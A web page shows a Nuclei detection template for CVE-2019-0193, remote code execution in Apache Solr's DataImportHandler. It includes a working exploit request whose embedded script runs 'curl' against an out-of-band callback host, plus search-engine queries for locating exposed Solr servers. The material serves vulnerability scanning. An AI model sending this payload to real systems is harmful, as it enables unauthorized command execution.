Skip to content
Nuclei Templates

Apache Solr DataImportHandler <8.2.0 - Remote Code Execution

ID: CVE-2019-0193

Severity: high

Author: pdteam

Tags: cve2019,cve,apache,rce,solr,oast,kev,vulhub

Description

Section titled “Description”

Apache Solr is vulnerable to remote code execution vulnerabilities via the DataImportHandler, an optional but popular module to pull in data from databases and other sources. The module has a feature in which the whole DIH configuration can come from a request’s “dataConfig” parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk.

YAML Source

Section titled “YAML Source”
id: CVE-2019-0193


info:
  name: Apache Solr DataImportHandler <8.2.0 - Remote Code Execution
  author: pdteam
  severity: high
  description: |
    Apache Solr is vulnerable to remote code execution vulnerabilities via the DataImportHandler, an optional but popular module to pull in data from databases and other sources. The module has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk.
  impact: |
    Successful exploitation of this vulnerability could lead to remote code execution, allowing an attacker to execute arbitrary commands on the affected system.
  remediation: |
    Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193
    - https://paper.seebug.org/1009/
    - https://issues.apache.org/jira/browse/SOLR-13669
    - https://nvd.nist.gov/vuln/detail/CVE-2019-0193
    - https://lists.apache.org/thread.html/1addbb49a1fc0947fb32ca663d76d93cfaade35a4848a76d4b4ded9c@%3Cissues.lucene.apache.org%3E
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2019-0193
    cwe-id: CWE-94
    epss-score: 0.9605
    epss-percentile: 0.99452
    cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: apache
    product: solr
    shodan-query:
      - cpe:"cpe:2.3:a:apache:solr"
      - http.title:"apache solr"
      - http.title:"solr admin"
    fofa-query:
      - title="solr admin"
      - title="apache solr"
    google-query:
      - intitle:"apache solr"
      - intitle:"solr admin"
  tags: cve2019,cve,apache,rce,solr,oast,kev,vulhub


http:
  - raw:
      - |
        GET /solr/admin/cores?wt=json HTTP/1.1
        Host: {{Hostname}}
        Accept-Language: en
        Connection: close
      - |
        POST /solr/{{core}}/dataimport?indent=on&wt=json HTTP/1.1
        Host: {{Hostname}}
        Content-type: application/x-www-form-urlencoded
        X-Requested-With: XMLHttpRequest


        command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20{{interactsh-url}}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport


    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"


      - type: word
        part: interactsh_request
        words:
          - "User-Agent: curl"


    extractors:
      - type: regex
        name: core
        group: 1
        regex:
          - '"name"\:"(.*?)"'
        internal: true
# digest: 490a0046304402205a880f5cfde6e5aeaab19b2343d99f84240d8641ad2a26d051d109ea80bd31f502201d01d93c38b906d9e8b0f2083d1d828fd12abe4a8e638eee19b9c016eb1143d4:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-0193.yaml"

View on Github